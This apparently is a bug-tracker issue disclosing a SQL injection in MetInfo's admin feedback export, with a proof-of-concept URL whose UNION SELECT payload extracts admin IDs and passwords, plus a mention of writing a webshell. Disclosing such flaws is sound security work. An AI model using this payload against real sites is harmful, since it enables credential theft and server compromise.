Open
Description
Attackers can get arbitrary data from the database.Even use sql to write a webshell.
POC:
1.First download the metinfo the Latest version from https://www.metinfo.cn/download/
2.Then install it and login as admin
3.Last request http://localhost/admin/index.php?n=feedback&c=feedback_admin&a=doexport&class1=-1//union//select//concat(admin_id,0x7e,admin_pass)//from/**/met_admin_table
Metadata
Metadata
Assignees
Labels
No labels

